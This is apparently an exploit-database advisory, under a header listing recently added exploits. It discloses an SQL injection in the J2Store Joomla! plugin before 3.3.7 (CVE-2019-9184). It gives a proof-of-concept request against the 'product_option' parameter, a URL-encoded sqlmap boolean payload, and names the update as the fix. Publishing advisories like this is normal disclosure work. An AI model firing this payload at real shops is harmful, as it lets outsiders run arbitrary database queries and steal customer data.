31edb35a91
9 changes to exploits/shellcodes FTP Server 1.32 - Denial of Service WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service TransMac 12.3 - Denial of Service (PoC) Simple Online Hotel Reservation System - SQL Injection Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) Joomla! Component J2Store < 3.3.7 - SQL Injection Usermin 1.750 - Remote Command Execution (Metasploit) Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)
25 lines
No EOL
957 B
Text
25 lines
No EOL
957 B
Text
# Exploit Title: J2Store Plugin for Joomla! < 3.3.6 - SQL Injection
|
|
# Date: 19/02/2019
|
|
# Author: Andrei Conache
|
|
# Twitter: @andrei_conache
|
|
# Contact: andrei.conache[at]protonmail.com
|
|
# Software Link: https://www.j2store.org
|
|
# Version: 3.x-3.3.6
|
|
# Tested on: Linux
|
|
# CVE: CVE-2019-9184
|
|
|
|
|
|
1. Description:
|
|
J2Store is the most popular shopping/e-commerce extension for Joomla!. The SQL Injection found allows any visitor to run arbitrary queries
|
|
on the website.
|
|
|
|
|
|
2. Proof of Concept:
|
|
|
|
- Parameter vulnerable: "product_option[j]" array (where j depends on entries)
|
|
- Example: [URL]/index.php?option=com_j2store&view=product&task=update&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX
|
|
- sqlmap: product_option[j]=%28CASE%20WHEN%20%284862%3D4862%29%20THEN%204862%20ELSE%204862%2A%28SELECT%204862%20FROM%20DUAL%20UNION%20SELECT%205348%20FROM%20DUAL%29%20END%29
|
|
|
|
|
|
3. Solution:
|
|
Update to 3.3.7 |